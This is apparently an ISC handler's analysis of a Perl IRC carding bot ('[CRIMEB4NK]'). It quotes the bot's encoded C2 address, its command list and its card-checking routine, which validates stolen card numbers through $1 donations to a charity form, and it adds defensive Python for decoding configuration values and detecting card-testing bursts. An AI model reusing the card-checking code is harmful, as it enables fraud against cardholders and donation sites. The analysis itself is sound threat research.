Yesterday, I got my hands on the source code of an IRC bot written in Perl. Yes, IRC ("Internet Relay Chat") is still alive! Although the protocol is less used today for communications between malware and its C2 servers, it remains an easy way for attackers to interact with malicious bots that offer them useful services. I had a quick look at the (poorly written) source code and found some interesting information:
For example, unused configuration values such as server IP addresses are stored Base64-encoded:

```perl
my $hostcri = "ODcuMjM2LjE5NC42OQ==";
$systemcri = MIME::Base64::decode($hostcri); # decodes to 87.236.194.69
```

Honestly, the bot was simply NOT working out of the box. I had to fix many issues in the code to get an "almost" working version. Of course, I did not test it against a public IRC server but deployed a quick lab based on Docker containers.

Container 1, the IRC server:

```
$ docker run --rm --name ircserver -p 6667:6667 xena/elemental-ircd
```

Container 2, the bot:

```
$ docker run --rm --name bot ubuntu:bot
$ docker cp bot.pl bot:/tmp
$ docker exec -it bot perl /tmp/bot.pl
```

Note: I had to install many Perl libraries because the bot generates a lot of HTTP requests and uses specific modules for this purpose, like WWW::Mechanize, WWW::Scripter or WWW::Selenium.

I added some debugging code and fired the bot with a simple configuration to force it to connect to my local IRC server container. By default, the bot joins a channel called "#deep" and presents itself with the nickname "[CRIMEB4NK]":

```
21:43 [CRIMEB4NK] has joined (~walled@172.17.q.y)
```

Let's have a look at the commands defined in the bot:

```
21:43 Xme: !help
21:43 [CRIMEB4NK]: Type !cmd to get command list
21:43 Xme: !cmd
21:43 [CRIMEB4NK]: -= BOt Commands =-
21:43 [CRIMEB4NK]: info: Suported [VISA] [MasterCard] [Disco ver] [American Express]
21:43 [CRIMEB4NK]: !chk .......: <ccnumber> <expdate> <cvv> to check cvv2
21:43 [CRIMEB4NK]: !ip ........: <ip address> to get info about an IP
21:43 [CRIMEB4NK]: !zip .......: <zip code> to get city and state by zip
```

In fact, the source code reveals more commands; here is the complete list:
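Decoding the Base64-stored configuration by hand is tedious when a bot has many such literals. The following is an added triage helper (not code from the diary or from the bot) that scans Perl source for scalar assignments holding Base64 text, decodes them and tags IP addresses and hostnames; the source excerpt is constructed, with only the $hostcri line taken from the post.

```python
import base64
import ipaddress
import re

# Constructed excerpt in the style of the quoted bot source: only the $hostcri
# line comes from the diary; the other literals are made up for the demo.
PERL_SOURCE = r'''
my $hostcri = "ODcuMjM2LjE5NC42OQ==";
$systemcri = MIME::Base64::decode($hostcri);
my $ircsrv  = "aXJjLmV4YW1wbGUubmV0";
my $chkcmd  = "!chk";
my $banner  = "-= BOt Commands =-";
'''

# A scalar assigned a double-quoted literal made only of Base64 characters.
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([A-Za-z0-9+/=]{8,})"')

def looks_like_b64(s):
    # Padded Base64 is a multiple of 4 chars with '=' only at the end.
    return len(s) % 4 == 0 and re.fullmatch(r'[A-Za-z0-9+/]+={0,2}', s) is not None

def classify(text):
    # Tag a decoded value as an IP address, a hostname or something else.
    try:
        ipaddress.ip_address(text)
        return "ip"
    except ValueError:
        pass
    if re.fullmatch(r'[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}', text):
        return "hostname"
    return "other"

def extract_encoded_config(source):
    """Return (variable, decoded value, kind) for each Base64 literal that decodes to printable ASCII."""
    found = []
    for var, literal in ASSIGN_RE.findall(source):
        if not looks_like_b64(literal):
            continue
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        if not raw.isascii() or not raw.decode("ascii").isprintable():
            continue
        decoded = raw.decode("ascii")
        found.append((var, decoded, classify(decoded)))
    return found

if __name__ == "__main__":
    for var, value, kind in extract_encoded_config(PERL_SOURCE):
        print(f"${var} -> {value} ({kind})")
```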
As I said, the bot does not work anymore. Its main function, the credit card validation, is broken because the victim's page added a CAPTCHA to prevent abuse (or because they detected too much suspicious activity?), but it is interesting to see how the check was implemented. They found a foundation that accepts online donations and they simply simulate a $1 donation. Here is the block of code which performs the check:

```perl
# Command format: !chk <ccnumber> <expdate> <cvv>
if($msg{'what'} =~ /^$chkcmd\s(\b[5436][0-9]{13,16}\b)\s(\d{4})\s(\b[0-9]{3,4}\b)/) {
  my ($numerocarta,$expmes,$verifica) = ($1,$2,$3);
  my $var1 = substr($expmes,0,2);
  my $var2 = substr($expmes,2,4);
  my $varType = 0;
  my $agent = WWW::Mechanize->new( autocheck => 1 );
  my $formfiller = WWW::Mechanize::FormFiller->new();
  $agent->env_proxy();
  $agent->get('hxxps://jajf[.]org/donate/donate-form.cfm');
  $agent->form_number(1) if $agent->forms and scalar @{$agent->forms};
  $agent->form_number(1);
  { local $^W; $agent->current_form->value('firstname', 'mark'); };
  { local $^W; $agent->current_form->value('lastname', 'smith'); };
  # All the form fields are processed here...
  { local $^W; $agent->current_form->value('message', 'charity'); };
  { local $^W; $agent->current_form->value('donationAmount', '1'); };
  { local $^W; $agent->current_form->value('cardName', 'mark smith'); };
  { local $^W; $agent->current_form->value('cardType', 'visa~Visa'); };
  { local $^W; $agent->current_form->value('cardNumber', ''.$numerocarta.''); };
  { local $^W; $agent->current_form->value('cardExpiration', ''.$var1.$var2.''); };
  { local $^W; $agent->current_form->value('cardAuthCode', ''.$verifica.''); };
  $agent->submit();
  print $agent->content,"\n";
  my $allo=$agent->content;
  open(FILE,">>chk13.html") or die "$!";
  print FILE "$allo\n";
  close FILE;
  my $allo=$agent->content;
  # The gateway's response text decides the verdict reported back on IRC.
  if ($allo =~/The transaction has been declined because of an AVS mismatch. The address provided does not match billing address of cardholder./){
  }elsif ($allo =~/This transaction has been declined./){
    # ...
  }elsif ($allo =~/The credit card number is invalid./){
    # ...
  }elsif ($allo =~/The card code is invalid./){
    # ...
  }elsif ($allo =~/The credit card has expired./){
    # ...
  }elsif ($allo =~/The credit card expiration date entered is not valid./){
    # ...
  }elsif ($allo =~//){   # empty pattern: Perl reuses the last successful match here
    # ...
  }elsif ($allo =~/A duplicate transaction has been submitted./){
    # ...
  }elsif ($allo =~/The credit card number entered is not valid./){
    # ...
  }elsif ($allo =~/This transaction has been declined./){
    # ...
  }elsif ($allo =~/Thanks to your important gift/){
  }
}
```

To conclude, the bot was not working in its current state and looked quite old, but it demonstrates that attackers keep developing tools to automate their actions. I did not find references on Google; I only found another version, posted on the first of February, with other IRC channel names.

Xavier Mertens (@xme)
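From the donation site's side, the check above leaves a recognisable footprint: bursts of minimum-amount submissions from one source, most of them declined by the gateway. The following is an added example (not from the diary or the bot) that flags such card-testing bursts over constructed application log lines; the log format and the thresholds are assumptions, the path and the gateway messages come from the quoted bot code.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed application log for the donation form; the format is assumed:
# "<ISO time> <client ip> POST <path> amount=<n> result=<gateway message>".
SAMPLE_LOG = """\
2018-03-08T21:40:01 203.0.113.7 POST /donate/donate-form.cfm amount=1 result=This transaction has been declined.
2018-03-08T21:40:03 203.0.113.7 POST /donate/donate-form.cfm amount=1 result=The card code is invalid.
2018-03-08T21:40:04 203.0.113.7 POST /donate/donate-form.cfm amount=1 result=The credit card number is invalid.
2018-03-08T21:40:06 203.0.113.7 POST /donate/donate-form.cfm amount=1 result=Thanks to your important gift
2018-03-08T21:40:09 203.0.113.7 POST /donate/donate-form.cfm amount=1 result=This transaction has been declined.
2018-03-08T21:41:30 198.51.100.20 POST /donate/donate-form.cfm amount=50 result=Thanks to your important gift
2018-03-08T21:55:12 203.0.113.7 POST /donate/donate-form.cfm amount=1 result=This transaction has been declined.
"""

DONATE_PATH = "/donate/donate-form.cfm"   # path targeted by the bot's !chk code

def parse_line(line):
    ts, ip, _method, path, amount, result = line.split(" ", 5)
    return {"ts": datetime.fromisoformat(ts), "ip": ip, "path": path,
            "amount": float(amount.split("=", 1)[1]),
            "declined": not result.startswith("result=Thanks")}

def find_card_testers(log_text, window=timedelta(minutes=5), min_attempts=4,
                      max_amount=1.0, min_decline_ratio=0.5):
    """Flag source IPs that submit many minimum-amount donations in a short
    window with a high decline rate: the footprint of the bot's !chk command."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        e = parse_line(line)
        if e["path"] == DONATE_PATH and e["amount"] <= max_amount:
            by_ip[e["ip"]].append(e)
    flagged = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        # Slide a window over each IP's attempts; flag on the first dense burst.
        for i, start in enumerate(events):
            burst = [e for e in events[i:] if e["ts"] - start["ts"] <= window]
            declines = sum(e["declined"] for e in burst)
            if len(burst) >= min_attempts and declines / len(burst) >= min_decline_ratio:
                flagged[ip] = {"attempts": len(burst), "declined": declines}
                break
    return flagged

if __name__ == "__main__":
    for ip, stats in find_card_testers(SAMPLE_LOG).items():
        print(f"card-testing suspected from {ip}: {stats}")
```

The successful $1 donation inside the burst is exactly what the bot reports as a "live" card, so a valid transaction surrounded by declines is part of the signal rather than a reason to clear the source.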
Xme, ISC Handler, Mar 8th 2018
How did you get the files?
I'm interested in the way the bots communicate with their servers, even if IRC is used less...

L4rs, Mar 8th 2018
Man, IRC, BitchX, EFnet, and warez. If only life were still so simple.

jACKtheRipper, Mar 10th 2018
Can you please provide more details on how the file can be downloaded?
Maybe a short tutorial would be of great help. Thanks, Michael https://mp3itnow.com

Anonymous, Mar 11th 2018
In this case, the file was found via my pastebin scraper...

Xme, ISC Handler, Mar 12th 2018